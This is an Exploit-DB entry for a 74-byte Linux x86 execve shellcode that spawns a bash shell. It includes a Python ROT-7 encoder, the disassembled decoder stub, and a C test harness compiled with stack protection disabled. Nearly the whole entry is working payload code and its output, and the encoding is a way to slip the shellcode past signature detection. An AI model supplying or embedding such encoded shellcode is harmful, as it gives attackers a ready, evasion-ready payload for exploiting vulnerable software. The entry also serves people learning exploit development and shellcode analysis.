Linux/x86 - execve() + ROT-7 Shellcode (Encoder/Decoder) (74 bytes)

2009-01-01T00:00:00
ID EDB-ID:43758
Type exploitdb
Reporter Exploit-DB
Modified 2009-01-01T00:00:00

Description

Linux/x86 - execve() + ROT-7 Shellcode (Encoder/Decoder) (74 bytes). Shellcode exploit for Linux_x86 platform

                                        
                                            /*

 ROT-7 Decoder Shellcode - Linux Intel/x86
 Author: Stavros Metzidakis

*/


a) Python ROT-7 encoder for shellcode (execve-stack)
---------------------------------------------------------------------------------------
#!/usr/bin/python

# Python ROT-7 Encoder

shellcode = ("\x31\xc0\x50\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80")

encoded = ""
encoded2 = ""

print 'Encoded shellcode ...'

for x in bytearray(shellcode) :
# boundary is computed as 255-ROT(x) where x, the amount to rotate by
    if x > 248:
        encoded += '\\x'
        encoded += '%02x' %(7 -(256 - x))
        encoded2 += '0x'
        encoded2 += '%02x,' %(7 -(256 - x))
    else:
        encoded += '\\x'
        encoded += '%02x'%(x+7)
        encoded2 += '0x'
        encoded2 += '%02x,' %(x+7)
    

print encoded

print encoded2

print 'Len: %d' % len(bytearray(shellcode))
---------------------------------------------------------------------------------------
Test run:
$ ./rot-7-encoder.py
Encoded shellcode ...
\x38\xc7\x57\x6f\x69\x68\x7a\x6f\x6f\x69\x70\x75\x36\x6f\x36\x36\x36\x36\x90\xea\x57\x90\xe9\x5a\x90\xe8\xb7\x12\xd4\x87
0x38,0xc7,0x57,0x6f,0x69,0x68,0x7a,0x6f,0x6f,0x69,0x70,0x75,0x36,0x6f,0x36,0x36,0x36,0x36,0x90,0xea,0x57,0x90,0xe9,0x5a,0x90,0xe8,0xb7,0x12,0xd4,0x87,
Len: 30




b) Decoder for a ROT-7 encoded shellcode (execve-stack)
---------------------------------------------------------------------------------------
$objdump -d rot-7-decoder -M intel 

rot-7-decoder:     file format elf32-i386


Disassembly of section .text:

08048060 <_start>:
 8048060:   eb 25                   jmp    8048087 <call_decoder>

08048062 <decoder>:
 8048062:   5e                      pop    esi
 8048063:   31 c9                   xor    ecx,ecx
 8048065:   b1 1e                   mov    cl,0x1e              ;ROTed shellcode length goes here

08048067 <decode>:
 8048067:   80 3e 07                cmp    BYTE PTR [esi],0x7
 804806a:   7c 05                   jl     8048071 <lowbound>
 804806c:   80 2e 07                sub    BYTE PTR [esi],0x7
 804806f:   eb 11                   jmp    8048082 <common_commands>

08048071 <lowbound>:
 8048071:   31 db                   xor    ebx,ebx
 8048073:   31 d2                   xor    edx,edx
 8048075:   b3 07                   mov    bl,0x7
 8048077:   b2 ff                   mov    dl,0xff
 8048079:   66 42                   inc    dx
 804807b:   2a 1e                   sub    bl,BYTE PTR [esi]
 804807d:   66 29 da                sub    dx,bx
 8048080:   88 16                   mov    BYTE PTR [esi],dl

08048082 <common_commands>:
 8048082:   46                      inc    esi
 8048083:   e2 e2                   loop   8048067 <decode>
 8048085:   eb 05                   jmp    804808c <Shellcode>

08048087 <call_decoder>:
 8048087:   e8 d6 ff ff ff          call   8048062 <decoder>

0804808c <Shellcode>:                               ;ROTed shellcode
 804808c:   38 c7                   cmp    bh,al
 804808e:   57                      push   edi
 804808f:   6f                      outs   dx,DWORD PTR ds:[esi]
 8048090:   69 68 7a 6f 6f 69 70    imul   ebp,DWORD PTR [eax+0x7a],0x70696f6f
 8048097:   75 36                   jne    80480cf <Shellcode+0x43>
 8048099:   6f                      outs   dx,DWORD PTR ds:[esi]
 804809a:   36                      ss
 804809b:   36                      ss
 804809c:   36                      ss
 804809d:   36                      ss
 804809e:   90                      nop
 804809f:   ea 57 90 e9 5a 90 e8    jmp    0xe890:0x5ae99057
 80480a6:   b7 12                   mov    bh,0x12
 80480a8:   d4 87                   aam    0x87
---------------------------------------------------------------------------------------


$ cat shellcode.c

#include <stdio.h>
#include <string.h>

unsigned char code[] = "\xeb\x25\x5e\x31\xc9\xb1\x1e\x80\x3e\x07\x7c\x05\x80\x2e\x07\xeb\x11\x31\xdb\x31\xd2\xb3\x07\xb2\xff\x66\x42\x2a\x1e\x66\x29\xda\x88\x16\x46\xe2\xe2\xeb\x05\xe8\xd6\xff\xff\xff\x38\xc7\x57\x6f\x69\x68\x7a\x6f\x6f\x69\x70\x75\x36\x6f\x36\x36\x36\x36\x90\xea\x57\x90\xe9\x5a\x90\xe8\xb7\x12\xd4\x87";

main()
{

    printf("Shellcode Length:  %d\n", strlen(code));

    int (*ret)() = (int(*)())code;

    ret();

}


$ gcc ./shellcode.c -fno-stack-protector -z execstack -o shellcode
$ ./shellcode
Shellcode Length:  74
$